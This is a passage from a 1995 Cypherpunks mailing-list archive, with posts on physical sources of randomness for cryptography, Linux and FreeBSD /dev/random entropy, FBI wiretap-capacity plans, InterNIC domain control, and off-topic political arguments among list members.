No, of course not.  Public random bits can be used in the derivation
of a shared key, to prevent replay attacks in key-exchange
protocols, but you certainly wouldn't want to use the public random
bits directly as key material!

>--Tim May

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey at delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMJqtkUHx57Ag8goBAQGWRgP1HES4nQiWRx0P31bi94g5MI8pSEwf5CZu
0RlWLyCl5CLB6PKu7bJDqiyHIBBJ90qqvJvZB740QHVxoRKycOD459nMWjiQXcnA
70Aq8gR+ZYCivsJLJfhKxoxuT+s/VyYVMB7mSfqGIGHHErbXHR4oA2T+Owmm8POi
WDr4w3OjyQ==
=3QHQ
-----END PGP SIGNATURE-----





From perry at piermont.com  Fri Nov  3 18:26:40 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 10:26:40 +0800
Subject: Sources of randomness
In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com>
Message-ID: <199511040044.TAA00751@jekyll.piermont.com>



Peter Monta writes:
> I'm puzzled by the implication that thermal noise or avalanche or Zener
> noise is somehow inferior to noise from radioactive sources.  It's not.

I didn't contend that its inferior. I contended that its difficult to
distinguish from sources of electronic interference and is easy to get
wrong.

> Take as an example Johnson noise, the voltage noise from a
> resistance.  It's the result of the interaction of vast numbers
> of electrons.  It is unpredictable in the same way that individual
> radioactive decay events are unpredictable, and they are both
> results of friendly quantum mechanics.

However, its very easy to be sure that the event in a radiation
detector was a radioactive decay event. It takes expertise to make
sure that the noise you hear off a noisy circuit isn't just
interference from other parts of the machine feeding back into the
circuit. The reason I like radioactive sources is that they are simple
and unambiguous in this way.

Someone can gimmick a zener diode or get it "wrong" a lot more easily
than they can get a radation event wrong.

Perry





From nbrodbeck at hollandhart.com  Fri Nov  3 18:35:04 1995
From: nbrodbeck at hollandhart.com (Noah Brodbeck)
Date: Sat, 4 Nov 1995 10:35:04 +0800
Subject: Telephone switch capacity -Reply
Message-ID: <s09a7458.054@allegro.net>


>>> John D. Ervin <jervin at netpath.net> 11/03/95 05:32pm
>You would be suprised as to how much is being tapped
>now.
>You need to do a little more research before spouting off..

>>If the FBI wishes to set up a system that is capable
>>of monitoring 1% of the total number of lines, that equates
>>to a ability to tap 5%, not 1% of all calls in progress. 

	I am very confused.  I was not 'spouting off' in any
sense of the word.  Your comment refers to my apparent
lack of knowledge of the widespread practice of
wiretapping.  A practice, at least according to the sworn
testimony of agents of the FBI, is not very widespread at all.
	That is, however, beside the point.  I was making a
very truthful comment about the engineered capacity of the
telephone network in the U.S.  I made no comment
whatsoever about the current ability or desire of the FBI to
tap into individuals telephone conversations.

								-=- Noah






From bdolan at use.usit.net  Fri Nov  3 18:53:01 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Sat, 4 Nov 1995 10:53:01 +0800
Subject: consumer products that make nice sources
Message-ID: <Pine.SOL.3.91.951103124506.27341A-100000@use.usit.net>


>Date: Fri, 3 Nov 1995 10:34:00 -0500 (EST)
>From: Brad Dolan <bdolan at use.usit.net>
>To: s1113645 at tesla.cc.uottawa.ca
>Cc: "Perry E. Metzger" <perry at piermont.com>, cypherpunks at toad.com
>Subject: Re: Sources of randomness 
>
>
>> What prices have you got listed? Is the equipment sensitive enough to get 
>> lots of entropy from a normal environment or do you need artificial sources
>> of radioactivity? (easy, safe and cheap enough to get?)


The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred.  
I think the following is the right phone number.

Sunshine Mine is an amusing concept.  People pay money to go breathe radon
there, while others are spending much money avoiding radon.

Anyway, the pillows make nice sources and good conversation pieces.

bd


>Safe, easy-to-obtain gamma sources:  orange fiesta-ware pottery (at flea 
>markets), old-style Coleman lantern mantles (not sure about the new 
>ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).
                                                     ^^^
                                                     406








From tcmay at got.net  Fri Nov  3 19:55:54 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 11:55:54 +0800
Subject: consumer products that make nice sources
Message-ID: <acc00caf110210040ee2@[205.199.118.202]>


At 5:46 PM 11/3/95, Brad Dolan wrote:

>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred.
>I think the following is the right phone number.
>
>Sunshine Mine is an amusing concept.  People pay money to go breathe radon
>there, while others are spending much money avoiding radon.
>
>Anyway, the pillows make nice sources and good conversation pieces.

I'd say they make poor sources. Far too large. A smaller source has better
access to the detector without adding much to the overall background the
user is exposed to. (I'm not saying low-level uranium or thorium sources
are much of a hazard, but the fluence presented at the detector is very low
for such an extended source.)

It depends on the detector type (alpha, beta, gamma, neutrino?), but high
count rates can be obtained in a variety of ways. (Don't get too high a
count rate, or the dead time characteristics of the pulse-height analyzers
will introduce spurious correlations that decrease entropy--I mention this
to show that even radiation detector sources of entropy have non-random
issues to take into account.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From perry at piermont.com  Fri Nov  3 19:57:10 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 11:57:10 +0800
Subject: [political noise] Re: Crypto & Taxes
In-Reply-To: <Pine.3.89.9511031916.A12313-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511040228.VAA00856@jekyll.piermont.com>



As much as I agree with you, this really doesn't belong in
Cypherpunks. This REALLY isn't a list about libertarian politics.

.pm

s1113645 at tesla.cc.uottawa.ca writes:
> 
> 
> On Fri, 3 Nov 1995 hallam at w3.org wrote:
> 
> > Why unfortunately? I happen to consider that our modern social ecconomy
> > is a high point of civilisation. It is certainly a tremendous achievement.
> > We can educate the entire population, provide them with health care,
> > prevent famine and provide protection against crime and agression by
> > other states. All in all rather a good deal.
> 
> That wonderful state of bliss seems rather limited in certain parts of 
> the world. 
> 
> Not that I want to get into a big political discussion, but David Friedman
> has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
> which argues anarchism/libertarianism from an economist'spoint of view. 
> The argument is not cased in terms of ethics and morals but rather 
> economic efficiency and utility. Slim, easy to read and cheap. He also 
> has a good sense of humor. Unfortunately the book is currently on back order.
> I'm holding on to my library copy until they ship one to me.
> 
> You can butt heads with him and Tim on the cyberia list (I don't remember 
> the address but they have it at news://nntp.hks.net )
> 
> I gather from the cyphernomicon that someone recently converted him to 
> cryptoanarchy.
> 
> 
> 





From futplex at pseudonym.com  Fri Nov  3 20:03:34 1995
From: futplex at pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 12:03:34 +0800
Subject: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031743.MAA12656@opine.cs.umass.edu>


James Kallstrom (FBI-NY) in The Washington Post:
>    "We've never done that many" taps at one time, he said. But
>    in a "worst-case scenario," such as a major act of
>    terrorism, the agency might need such ability, he said. "I
>    think it's a reasonable, minimal, conservative number."

In other words, they'll "round up the usual suspects" ?  Mr. Sose
to a White Courtesy Telephone, please.

The argument above is very different (and IMHO much less defensible for the
FBI) than the claim that the LEAs will in general have more investigations in
progress that require wiretapping. A gradual increase in wiretap orders in
a given area could plausibly happen as more and more interesting traffic
goes over the wire. But a sudden jump in activity after a crime has been
committed looks like a big fishing expedition. In particular, I fear that
judges will be more disposed to sign stacks of wiretap orders 
indiscriminately in the aftermath of a major act of violence.

-Futplex <futplex at pseudonym.com>

 





From s1113645 at tesla.cc.uottawa.ca  Fri Nov  3 20:05:01 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 4 Nov 1995 12:05:01 +0800
Subject: Sources of randomness
In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com>
Message-ID: <Pine.3.89.9511032041.C12313-0100000@tesla.cc.uottawa.ca>




On Fri, 3 Nov 1995, Peter Monta wrote:

> I'm puzzled by the implication that thermal noise or avalanche or Zener
> noise is somehow inferior to noise from radioactive sources.  It's not.

How much do the appropriate Zener diodes (it *is* diodes we're talking 
about, right?) cost? Are these things widely available? (sorry I really don't
remember my electronics lessons)

How would you get your first two sources? (the thermal and avalanche)






From perry at piermont.com  Fri Nov  3 20:09:50 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 12:09:50 +0800
Subject: video as a source of public randomness
In-Reply-To: <acbf9287090210045bcb@[205.199.118.202]>
Message-ID: <199511031747.MAA00192@jekyll.piermont.com>



[I understand that this isn't your suggestion...]

Timothy C. May writes:
> I was commenting on the sources of randomness, such as atmospheric RF
> variations, antenna configuration, tuner sensitivity, amplifier noise,
> etc., that would make prediction of snow bits very difficult.

I feel leery about these things if only because, as I've noted, trying
to get these things "just right" and make sure that you are getting
noise and not, say, high frequency hum from your own switching power
supply, is very hard. You can set up a geiger counter if you are
merely moderately competant. I don't know who I would trust to do
analog stuff "just right". Do things a little wrong, and you merely
have a huge search space and not an impossibly huge one -- the sort of
toehold cryptanalysts want.

> I have no brief with any of the proposed schemes: nearly any are better
> than what we have now, if widely deployed and suitable used.

Agreed.

Perry





From tcmay at got.net  Fri Nov  3 20:10:04 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 12:10:04 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
Message-ID: <acbf8a88070210047acb@[205.199.118.202]>


At 2:48 PM 11/3/95, Ray Arachelian wrote:


>Now does anyone want my old 1st edition? :-)

I am interested. I will trade five (5) slightly used prime numbers for it.

(Has anybody ever thought about using prime numbers as a medium of barter
in a digital economy? Think of the labor that would be saved if we all
didn't have to compute our own!! :-})

--Klaus! von Used Primes

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From sjb at universe.digex.net  Fri Nov  3 20:12:48 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Sat, 4 Nov 1995 12:12:48 +0800
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199511021747.JAA08919@orac.engr.sgi.com>
Message-ID: <199511031805.NAA09698@universe.digex.net>


Tom Weinstein writes:
>In article <DHEtE6.FB6 at sgi.sgi.com>, Mark Murray <mark at grondar.za> writes:
>> I chatted with a colleague at work, and he helped bend my mind right.
>> I had the mistaken notion that adding lots of data would "overflow"
>> and "dilute" the entropy to an attackable state.
>
>I think the problem is not merely flooding the device with non-random
>input data.  If you coordinate sucking out entropy with feeding in
>non-random data you can suck the real entropy in the system down to zero
>while making the driver think it has plenty of randomness.  While it's
>not clear to me how this would lead to an attack, it would be worrisome.

You need a similar "mind bending".  "Feeding in non-random data"
doesn't lead to the driver thinking it has "plenty of randomness" left,
since it doesn't increase the entropy level to counteract the decrease
from the entropy-sucker.

The hard part would be having the driver figure out how much entropy
it's getting from the input.  "Non-random" implies some sort of
correlation between the bits.  I can't think of any way of measuring
that which doesn't make some sort of "horizon" that a malicious user
can confuse.

The simple mechanism would be to assume that input from untrusted users
adds no entropy, forcing entropy estimates to represent a lower bound.





From perry at piermont.com  Fri Nov  3 20:13:04 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 12:13:04 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <199511031659.LAA08943@jekyll.piermont.com>



I strongly disagree with Mr. Hallam, but I am replying in private
mail. This is far off the topic of the list.

hallam at w3.org writes:
> 
> >>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
> >>by people as well as EARNED by people.  Most payers have easily 
> >>detectible physical presence and assets that can easily be attached by 
> >>regulators.   It will be a cold day before, e.g., my employer agrees not 
> >>to report my earnings.  And the same is true for most employers in most 
> >>industries.  
> 
> >Unfortunately, this is true, at least for people whose employers are
> >subject to income tax somewhere.  Taxing businesses doesn't make sense
> >economically - you could collect almost as much money with far less disrupti
on
> >to the underlying economy by taxing it as wages for workers and
> 
> Why unfortunately? I happen to consider that our modern social ecconomy
> is a high point of civilisation. It is certainly a tremendous achievement.
> We can educate the entire population, provide them with health care,
> prevent famine and provide protection against crime and agression by
> other states. All in all rather a good deal.
> 
> While one might wish to personally avoid paying taxes there are no benefits i
f 
> everyone avoids paying taxes. There are significant areas of the ecconomy
> which can only be funded through social mandates, roads for example.
> While there are fringe political elements who put forward alternative models
> I find them no more convincing than the claims of the Marxists who made
> similarly ideologically based assertions not so long ago. There have at 
> least been examples of Marxist states, even though they were not particularly
> successful and rapidly degenerated into dictatorships.
> 
> 
> I find the libertopian obsession with government oppression and complete
> indifference towards coporate exploitation unsatisfactory. The truth is
> that both are inevitablty interlinked. For the "libertarian" it is 
> unsatisfactory for the government to exploit consumers of utilities but
> entirely satisfactory for corporations to do so should they have the chance.
> The theoretical possiblity of competition making this acceptable even
> where there is no actual competition and hence no choice. This 
> corprativist model accepts supression of freedom provided it is to
> commercial goals.
> 
> Consider the linkage between direct mail advertising and surveilance. It
> is unecconomic for a government to trace the movements of every citizen.
> The communist countries were brought down as much by the cost of the huge
> surveilace administrations they constructed as anything else. In the
> West we do not have government surveilance, we have direct mail marketers
> do the job for government. Surveilance is made ecconomic by getting the
> citizen to subsidise it. It is naturally open for the government to apply
> information collected by these people for their own purposes. It is a 
> salable commodity and the government is a willing buyer. Furthermore there
> is a sophisticated infrastructure in place to achieve these ends.
> 
> The extent of corporate surveillance goes unnoticed by most citizens. Few
> people realise that when they use their credit card in a supermarket they
> are supplying a direct mail marketing company with a profile of their
> spending paterns. They are also providing a statement of where they are,
> and indirectly their income, residence etc.
> 
> What is needed is stringent data protection laws which enforce the 
> confidentiality of personal information. Note that both the SEPP and
> STT payments systems conceal the credit card number from the merchant.
> Cryptographic locks on individual parts of the picture are insufficient 
> however. What is needed is laws which make the financing of the 
> underlying architecture unecconomic.
> 
> 		Phill
> 
> 
> 





From sharborth at hai-net.com  Fri Nov  3 20:14:15 1995
From: sharborth at hai-net.com (sharborth at hai-net.com)
Date: Sat, 4 Nov 1995 12:14:15 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <9510038154.AA815422767@houston_cc_smtp.hai-net.com>



Subject: Re: FBI seeks huge wiretapping system 
Author:  Jay Campbell <edge at got.net> at internet
Date:    03-11-95 06:08


>I was being facetious. The point is that the government has no 
>inherent right to tap our phones -- indeed, it didn't do so for nearly 
>the first 200 years of our existance, and we did just fine -- better, 
>in fact. 
     
It is a well-known fact that it was common practice for NSA operatives to
                                                        ^^^
masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
                            ^^^^^^
I think you'll find the NSA was not in existence in the 1800's.


to intercept communications between targeted parties. This practice lost 
popularity towards the end of the century with the advent of boxed cereal, 
and with it the Lone Ranger Decoder Ring, since the operatives were too 
underfunded to afford anything more than oatmeal.
     
[ducks]
--
   Jay Campbell                edge at got.net - Operations Manager 
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node 
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
     
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."
     






From s1113645 at tesla.cc.uottawa.ca  Fri Nov  3 20:15:46 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 4 Nov 1995 12:15:46 +0800
Subject: Sources of randomness
In-Reply-To: <199511031427.JAA08758@jekyll.piermont.com>
Message-ID: <Pine.3.89.9511030915.B49857-0100000@tesla.cc.uottawa.ca>




On Fri, 3 Nov 1995, Perry E. Metzger wrote:

> I'll stick to recommending radioactive sources for now. Quantum
> mechanics is your friend, and detectors from places like Aware are
> cheap.
What prices have you got listed? Is the equipment sensitive enough to get 
lots of entropy from a normal environment or do you need artificial sources
of radioactivity? (easy, safe and cheap enough to get?)
Got any clues on random bits vs. time?

Someone said this was discussed before, I caught the thread on the 
detector being listed but not any discussion of the product itself. Could 
anyone post an approx date so I could go look it up on the archive?
Gracias.
Interesting stuff.





From pmonta at qualcomm.com  Fri Nov  3 20:59:49 1995
From: pmonta at qualcomm.com (Peter Monta)
Date: Sat, 4 Nov 1995 12:59:49 +0800
Subject: Sources of randomness
Message-ID: <199511032324.PAA22269@mage.qualcomm.com>


I'm puzzled by the implication that thermal noise or avalanche or Zener
noise is somehow inferior to noise from radioactive sources.  It's not.

Take as an example Johnson noise, the voltage noise from a
resistance.  It's the result of the interaction of vast numbers
of electrons.  It is unpredictable in the same way that individual
radioactive decay events are unpredictable, and they are both
results of friendly quantum mechanics.

Small biases/interferences that come from nonideally sampling such
voltages do not matter, since the entropy is still 1-epsilon bits per
sample (more for nonbinary samples).  There is no "chink in the
armor" available for cryptanalysis---the user need only acquire
N*(1+epsilon) random bits rather than N bits.

The video-snow-noise described by Tim May is mostly Johnson noise
in the low-noise-amplifier electonics, not atmospheric or ionospheric
noise, at least above 50 MHz or so.

Cheers,
Peter Monta   pmonta at qualcomm.com
Qualcomm, Inc./Globalstar






From shields at tembel.org  Fri Nov  3 22:23:49 1995
From: shields at tembel.org (Michael Shields)
Date: Sat, 4 Nov 1995 14:23:49 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <47eti3$18q@yage.tembel.org>


(Hopefully someone will correct me if any of this is wrong.  But it
would be nice if the thread ends.)

Here's how it works, politically.  IANA is the ultimate custodian of
the namespace.  IANA has delegated administrative control of the six
traditional top-level domains (TLDs) to the InterNIC.

The InterNIC is a building in my zipcode.  It's in a mundane industrial
park they share with PSI.  It is operated by NSI, which is owned by SAIC,
and funded by an NSF grant and the new domain charges.

Here's how it works, technically.  Your nameserver, if it doesn't
know how to jump into the middle of the tree (via cached data, or the
preconfigured servers for the local domain and the root), will start at
the top of the tree and walk down.

The root nameservers are run by volunteers.  There are nine.  One is
at the InterNIC, but it need not be.  The others are at ISI, PSI, UMD,
NASA, UUNET (ISC), DDN, the Army Research Lab, and NORDUnet (in Sweden).

(The most central point is actually Paul Vixie, maintainer of BIND,
the software used for almost all nameservers, including the roots.
UUNET funds BIND development.)

If the InterNIC yanked your domain, this would *not* affect your IP
connectivity -- your ability to be reached by any Internet protocol via
IP address.  The InterNIC has nothing at all to do with that.

I'm much more worried about a lack of competency at NSI than I am about
the FBI asking them to pull the plug on troublemakers, especially since
it would be taken very seriously if you had a legitimate complaint
about unjust termination (and some people, upset at having to pay for
their domain(s), are looking for any reason to tear into the InterNIC's
reputation).

And *especially* since the evil government types could just call up
Bell Atlantic, who they are already friendly with, and have them make
my line unusable.  That's what I'd do, were I an evil government type.

And if anyone wanted to subvert your domain at a small fraction of the
sites, DNS is easily spoofable....

So keep a sense of perspective.
-- 
Shields.





From tcmay at got.net  Fri Nov  3 22:27:29 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 14:27:29 +0800
Subject: Physician, Heal Thyself
Message-ID: <acbf8c7e08021004f0bb@[205.199.118.202]>


At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Tim May will doubtless disagree, but he has nothing else to do in life
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>than read the net so his incentives to see traffic minimized aren't
>the same as other people's.


Perry, would you please knock off the drone of snide remarks about me? I
mostly don't respond to your posts. You often make very good points, but at
other times you demonstrate a shrillness and apparent lack of socialization
that I find appalling.

Your snide remarks are, to use your own rhetoric, "wasteful of bandwidth."
They are also tacky, childish, and pointless.

You are often quick to say "What has this got to do with Cypherpunks?," but
you yourself are perfectly willing to rant on about Nietzsche, the East
Germans, and Louis Freeh. Physician, heal thyself.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From jbell at capecod.net  Fri Nov  3 23:02:02 1995
From: jbell at capecod.net (John Curtis)
Date: Sat, 4 Nov 1995 15:02:02 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <01BAAA51.0BAA6820@hy34.capecod.net>

Nothing ventured, nothing gained.  I don't mind reading serious
questions no matter how naive, provided that the questioner is
willing to listen to the responses no matter how acerbic.
You would have to have a pretty thick skin to post here frequently.
----------
From: 	Futplex[SMTP:futplex at pseudonym.com]
Sent: 	Friday, November 03, 1995 2:30 PM
To: 	Cypherpunks Mailing List
Subject: 	Re: Many Topics are Appropriate for Discussion Here

I have some not-so-hypothetical questions: 

Suppose I have serious and plausibly realistic aspirations to become an 
authority in some subtopic of cryptography, network security, etc. (sometime 
well into the next millenium). Am I more likely to learn and hone my skills
by actively participating (sticking my neck out) or merely lurking
indefinitely ?  Regardless of the answer to the previous question, should
the list suffer me my missteps and naivete ?

I do not consider these questions rhetorical, and the answers are very
important to me on a personal level.

And now I believe I'll shut up for a while.

-Futplex <futplex at pseudonym.com>


-------------- next part --------------
A non-text attachment was scrubbed...
Name: bin00000.bin
Type: application/octet-stream
Size: 2067 bytes
Desc: "application/ms-tnef"
URL: <https://lists.cpunks.org/pipermail/cypherpunks-legacy/attachments/19951104/ba26d711/attachment.bin>

From die at pig.die.com  Fri Nov  3 23:58:41 1995
From: die at pig.die.com (Dave Emery)
Date: Sat, 4 Nov 1995 15:58:41 +0800
Subject: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID: <9511032316.AA06015@pig.die.com>


	Dr. Fred writes:

> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it.  I know people who have
> experienced these visitations and felt highly constrained as a result.


	Could you possibly elaborate on this ?  Was this overseas
where the NSA might be presumed to be involved or domesticaly ?
(And of course was it in the USA or elsewhere ?)

> 
						Dave Emery 
						die at die.com






From s1113645 at tesla.cc.uottawa.ca  Fri Nov  3 23:58:51 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 4 Nov 1995 15:58:51 +0800
Subject: [political noise] Re: Crypto & Taxes
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <Pine.3.89.9511031916.A12313-0100000@tesla.cc.uottawa.ca>




On Fri, 3 Nov 1995 hallam at w3.org wrote:

> Why unfortunately? I happen to consider that our modern social ecconomy
> is a high point of civilisation. It is certainly a tremendous achievement.
> We can educate the entire population, provide them with health care,
> prevent famine and provide protection against crime and agression by
> other states. All in all rather a good deal.

That wonderful state of bliss seems rather limited in certain parts of 
the world. 

Not that I want to get into a big political discussion, but David Friedman
has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
which argues anarchism/libertarianism from an economist'spoint of view. 
The argument is not cased in terms of ethics and morals but rather 
economic efficiency and utility. Slim, easy to read and cheap. He also 
has a good sense of humor. Unfortunately the book is currently on back order.
I'm holding on to my library copy until they ship one to me.

You can butt heads with him and Tim on the cyberia list (I don't remember 
the address but they have it at news://nntp.hks.net )

I gather from the cyphernomicon that someone recently converted him to 
cryptoanarchy.







From futplex at pseudonym.com  Sat Nov  4 00:00:38 1995
From: futplex at pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 16:00:38 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <199511030603.BAA24442@opine.cs.umass.edu>


clarkm at cnct.com writes:
> > Last year, federal and state courts authorized 1,154 wiretaps, 
[...]
> > "People are starting to say that seems awfully high," Dempsey said, noting 
> > that the overall level of such surveillance activity is now a total of 
> > 20,000 to 25,000 intercepts nationwide over an entire year.
> 
> So what is it?  1,154 wiretaps?  Or 20,000?

For one thing, many conversations on a line may be intercepted over time
after the initial wiretap order is given. Also wiretapping is not the only 
form of electronic surveillance that tends to get reported in these numbers. 

The official federal wiretap reports for the last several years place the
number of wiretaps in the neighborhood of 1,000+ in each of those years. 

Actually the number 20,000 sounds strange -- it seems too high merely to be
a total of surveillance orders/operations, yet far too low to count all
interceptions. I recently heard the total number of conversations intercepted
per year in the U.S. estimated on the order of 2,000,000. Some rather small
percentage of those were categorized as "incriminating". I suppose it might
have been 1%, which would work out to 20,000 incriminating intercepted calls
per year nationwide.

-Futplex <futplex at pseudonym.com>





From perry at piermont.com  Sat Nov  4 00:02:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 16:02:30 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <199511040057.TAA00783@jekyll.piermont.com>



Futplex writes:
> Perry writes:
> > I don't care about quantity. Steve Bellovin is worth 500 subscribers
> > -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
> > lot of this stuff than most of what passes for careful thought from
> > the average person here.
> 
> I have some not-so-hypothetical questions: 
> 
> Suppose I have serious and plausibly realistic aspirations to become an 
> authority in some subtopic of cryptography, network security, etc. (sometime 
> well into the next millenium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely ?  Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete ?
> 
> I do not consider these questions rhetorical, and the answers are very
> important to me on a personal level.

I don't see any problem with a naive person participating. I do see
something wrong with people posting stuff that has nothing whatsoever
to do with the topic of cryptography etc. A discussion of social
security privatization might be interesting, but irrelevant, to name
one example.

Perry






From JMKELSEY at delphi.com  Sat Nov  4 00:08:00 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Sat, 4 Nov 1995 16:08:00 +0800
Subject: wiretaping ability and future plans
Message-ID: <01HX6STU0B649AO7EU@delphi.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 02 Nov 1995 01:55:06 -0800
>From: Jay Campbell <edge at got.net>
>Subject: FBI seeks huge wiretapping system

>FBI seeks huge wiretapping system
>BY JOHN MARKOFF
>New York Times

>``These are staggering numbers,'' said Mark Rasch, director of
>information security law and policy for Science Applications
>International Corp. in McLean, Va. ``Either they do a lot more
>wiretaps than they now admit, or they plan on doing a significant
>larger number of wiretaps in the future because of the fear of
>domestic terrorism.''

I can see at least two possible alternative explanations:

1.   The FBI envisions a time when voice-recognition systems will be
cheap enough to do "keyword searches" on digital voice in something
close to real time, with high accuracy.  This might be useful when
fishing for crime, dissent, etc.  It would certainly require some
rather broader powers, but they may expect this, especially if they
expect more acts of domestic and foreign terrorism.

2.   After implementing some kind of widespread escrowed crypto, the
FBI envisions recording lots of encrypted phone conversations,
perhaps targeted on suspiscious people, perhaps random.  Since the
whole conversation is encrypted, this might not violate any laws,
since they still have to get the warrant to recover the
conversation.  This would get them past the obvious practical
problem with most wiretap-based investigations--if you start your
wiretap three days after the target becomes a suspect, you've
probably missed all the juicy stuff.  Only a bit of carelessness or
stupidity on the part of your target will get the desired
information.

>   Jay Campbell                edge at got.net - Operations Manager
>   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
>   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey at delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJm0AUHx57Ag8goBAQGHTAP/XCsTUjb26sLB+UORMQCNjtBz2dhCjcF2
QkKfRjuUcBOG3z/nCeLDgfb1hWiiSYJwRhJOTG0dCcqS9k9gO//hpC4CsDz3y0Yw
mt5sG4X6POB+ljBfFOHqM7joekLmnmbodZQYdmiFTHbZ/Zn4w4obrTRjcPKhlQH9
Fctxd8JCYyg=
=ITxA
-----END PGP SIGNATURE-----





From JMKELSEY at delphi.com  Sat Nov  4 00:09:30 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Sat, 4 Nov 1995 16:09:30 +0800
Subject: video as a source of public randomness
Message-ID: <01HX6SUGVCSI9AO7EU@delphi.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 02 Nov 1995 00:39:29 -0800
>From: tcmay at got.net (Timothy C. May)
>Subject: Re: Video as a source of randomness

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)

This seems like a potential source of a stream of public random
bits.  If these can be authenticated and matched, this kind of thing
can be useful in a lot of protocols.  For example, if there is some
packet structure in the digital video transmission which has at
least 160 bits of entropy, then we can take the SHA1(packet[i]) to be
public random bit block i.  (If we're worried about entropy, we can
collect arbitrarily large numbers of packets to hash per 160-bit
public random block.)

For large-scale, above ground protocols, these packets would need
some kind of signature or other authentication.  However, for
protocols that could handle having the public random string checked
offline later, this idea provides a reasonably good public random
string that can be used without any knowledge or consent of the
broadcaster/cable system/satellite system/whatever.  If the
transmission is sent under encryption, so much the better.  This
does still leave the possibility that an attacker could control the
broadcaster's transmissions for a few seconds, but this seems
